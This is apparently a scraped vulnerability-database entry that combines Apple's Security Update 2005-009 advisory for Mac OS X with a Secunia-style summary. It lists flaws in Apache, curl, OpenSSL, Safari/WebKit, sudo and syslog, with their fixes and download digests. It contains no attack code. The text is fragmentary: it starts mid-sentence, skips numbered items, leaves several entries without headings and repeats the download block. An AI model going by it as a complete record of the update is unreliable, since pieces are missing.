HELIOS Software GmbH for reporting this issue.
Security Update 2005-009 may be obtained from the Software Update
pane in System Preferences, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.4.3
The download file is named: "SecUpd2005-009Ti.dmg"
Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1
For Mac OS X Server v10.4.3
The download file is named: "SecUpdSrvr2005-009Ti.dmg"
Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60
For Mac OS X v10.3.9
The download file is named: "SecUpd2005-009Pan.dmg"
Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650
For Mac OS X Server v10.3.9
The download file is named: "SecUpdSrvr2005-009Pan.dmg"
Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13
Information will also be posted to the Apple Product Security
web site:
http://docs.info.apple.com/article.html?artnum=61798
This message is signed with Apple's Product Security PGP key,
and details are available at:
http://www.apple.com/support/security/pgp/
VAR-200512-0288 | CVE-2005-3701 | Mac OS X Server passwordserver Unknown privilege escalation vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in passwordserver in Mac OS X Server 10.3.9 and 10.4.3, when creating an Open Directory master server, allows local users to gain privileges via unknown attack vectors. The 'passwordserver' tool is prone to a local privilege-escalation vulnerability.
NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability.
For more information:
SA14530
2) An error in the Apache web server's "mod_ssl" module may be
exploited by malicious people to bypass certain security
restrictions.
For more information:
SA16700
3) A boundary error exists in CoreFoundation when resolving certain
URLs.
4) An error in curl when handling NTLM authentication can be
exploited by malicious people to compromise a user's system.
For more information:
SA17193
5) An error exists in the ODBC Administrator utility helper tool
"iodbcadmintool".
6) An error in OpenSSL when handling certain compatibility options
can potentially be exploited by malicious people to perform protocol
rollback attacks.
8) An integer overflow error exists in the PCRE library that is used
by Safari's JavaScript engine. This can potentially be exploited by
malicious people to compromise a user's system.
This can be exploited to cause the download file to be saved outside
of the designated download directory.
For more information:
SA15474
11) A boundary error exists in WebKit when handling certain specially
crafted content.
For more information:
SA15744
13) The syslog server does not properly sanitise messages before
recording them.
SOLUTION:
Apply Security Update 2005-009.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=302847
OTHER REFERENCES:
SA14530:
http://secunia.com/advisories/14530/
SA16700:
http://secunia.com/advisories/16700/
SA17193:
http://secunia.com/advisories/17193/
SA17151:
http://secunia.com/advisories/17151/
SA16502:
http://secunia.com/advisories/16502/
SA15474:
http://secunia.com/advisories/15474/
SA15744:
http://secunia.com/advisories/15744/
APPLE-SA-2005-11-29 Security Update 2005-009
Security Update 2005-009 is now available and delivers the following
security enhancements:
Apache2
CVE-ID: CVE-2005-2088
Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3
Impact: Cross-site scripting may be possible in certain
configurations
Description: The Apache 2 web server may allow an attacker to bypass
protections using specially-crafted HTTP headers. This behavior is
only present when Apache is used in conjunction with certain proxy
servers, caching servers, or web application firewalls. This update
addresses the issue by incorporating Apache version 2.0.55.
apache_mod_ssl
CVE-ID: CVE-2005-2700
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: SSL client authentication may be bypassed in certain
configurations
Description: The Apache web server's mod_ssl module may allow an
attacker unauthorized access to a resource that is configured to
require SSL client authentication. Only Apache configurations that
include the "SSLVerifyClient require" directive may be affected.
This update addresses the issue by incorporating mod_ssl 2.8.24 and
Apache version 2.0.55 (Mac OS X Server).
CoreFoundation
CVE-ID: CVE-2005-2757
Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3
Impact: Resolving a maliciously-crafted URL may result in crashes or
arbitrary code execution
Description: By carefully crafting a URL, an attacker can trigger a
heap buffer overflow in CoreFoundation which may result in a crash or
arbitrary code execution. CoreFoundation is used by Safari and other
applications. This update addresses the issue by performing
additional validation of URLs. This issue does not affect systems
prior to Mac OS X v10.4.
curl
CVE-ID: CVE-2005-3185
Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3
Impact: Visiting a malicious HTTP server and using NTLM
authentication may result in arbitrary code execution
Description: Using curl with NTLM authentication enabled to download
an HTTP resource may allow an attacker to supply an overlong user or
domain name. This may cause a stack buffer overflow and lead to
arbitrary code execution. This update addresses the issue by
performing additional validation when using NTLM authentication.
This issue does not affect systems prior to Mac OS X v10.4.
This helper tool contains a vulnerability that may allow local users
to execute arbitrary commands with raised privileges. This update
addresses the issue by providing an updated iodbcadmintool that is
not susceptible.
OpenSSL
CVE-ID: CVE-2005-2969
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Applications using OpenSSL may be forced to use the weaker
SSLv2 protocol
Description: Applications that do not disable SSLv2 or that enable
certain compatibility options when using OpenSSL may be vulnerable to
a protocol downgrade attack. Such attacks may cause an SSL
connection to use the SSLv2 protocol which provides less protection
than SSLv3 or TLS. Further information on this issue is available at
http://www.openssl.org/news/secadv_20051011.txt. This update
addresses the issue by incorporating OpenSSL version 0.9.7i.
This update addresses the issue by ensuring the credentials are
protected.
Safari
CVE-ID: CVE-2005-2491
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Processing a regular expression may result in arbitrary
code execution
Description: The JavaScript engine in Safari uses a version of the
PCRE library that is vulnerable to a potentially exploitable heap
overflow. This may lead to the execution of arbitrary code. This
update addresses the issue by providing a new version of the
JavaScript engine that incorporates more robust input validation.
Safari
CVE-ID: CVE-2005-3702
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Safari may download files outside of the designated download
directory
Description: When files are downloaded in Safari they are normally
placed in the location specified as the download directory. However,
if a web site suggests an overlong filename for a download, it is
possible for Safari to create this file in other locations. Although
the filename and location of the downloaded file content cannot be
directly specified by remote servers, this may still lead to
downloading content into locations accessible to other users. This
update addresses the issue by rejecting overlong filenames.
Safari
CVE-ID: CVE-2005-3703
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: JavaScript dialog boxes in Safari may be misleading
Description: In Safari, JavaScript dialog boxes do not indicate the
web site that created them. This could mislead users into
unintentionally disclosing information to a web site. This update
addresses the issue by displaying the originating site name in
JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research
for reporting this issue.
Safari
CVE-ID: CVE-2005-3705
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Visiting malicious web sites with WebKit-based applications
may lead to arbitrary code execution
Description: WebKit contains a heap overflow that may lead to the
execution of arbitrary code. This may be triggered by content
downloaded from malicious web sites in applications that use WebKit
such as Safari. This update addresses the issue by removing the heap
overflow from WebKit. Credit to Neil Archibald of Suresec LTD and
Marco Mella for reporting this issue.
Although the default configuration is not vulnerable to this issue,
custom sudo configurations may not properly restrict users. Further
information on this issue is available from:
http://www.sudo.ws/sudo/alerts/path_race.html
This update addresses the issue by incorporating sudo version
1.6.8p9.
syslog
CVE-ID: CVE-2005-3704
Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3
Impact: System log entries may be forged
Description: The system log server records syslog messages verbatim.
By supplying control characters such as the newline character, a
local attacker could forge entries with the intention to mislead the
system administrator. This update addresses the issue by specially
handling control characters and other non-printable characters. This
issue does not affect systems prior to Mac OS X v10.4. Credit to
HELIOS Software GmbH for reporting this issue.
Additional Information
Also included in this update are enhancements to Safari to improve
handling of credit card security codes (Mac OS X v10.3.9 and Mac OS X
v10.4.3), CoreTypes to improve handling of Terminal files (Mac OS X
v10.4.3), QuickDraw Manager to improve rendering of PICT files (Mac
OS X v10.3.9), documentation regarding OpenSSH and PAM (Mac OS X
v10.4.3), and ServerMigration to remove unneeded privileges.
Security Update 2005-009 may be obtained from the Software Update
pane in System Preferences, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.4.3
The download file is named: "SecUpd2005-009Ti.dmg"
Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1
For Mac OS X Server v10.4.3
The download file is named: "SecUpdSrvr2005-009Ti.dmg"
Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60
For Mac OS X v10.3.9
The download file is named: "SecUpd2005-009Pan.dmg"
Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650
For Mac OS X Server v10.3.9
The download file is named: "SecUpdSrvr2005-009Pan.dmg"
Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13
Information will also be posted to the Apple Product Security
web site:
http://docs.info.apple.com/article.html?artnum=61798
This message is signed with Apple's Product Security PGP key,
and details are available at:
http://www.apple.com/support/security/pgp/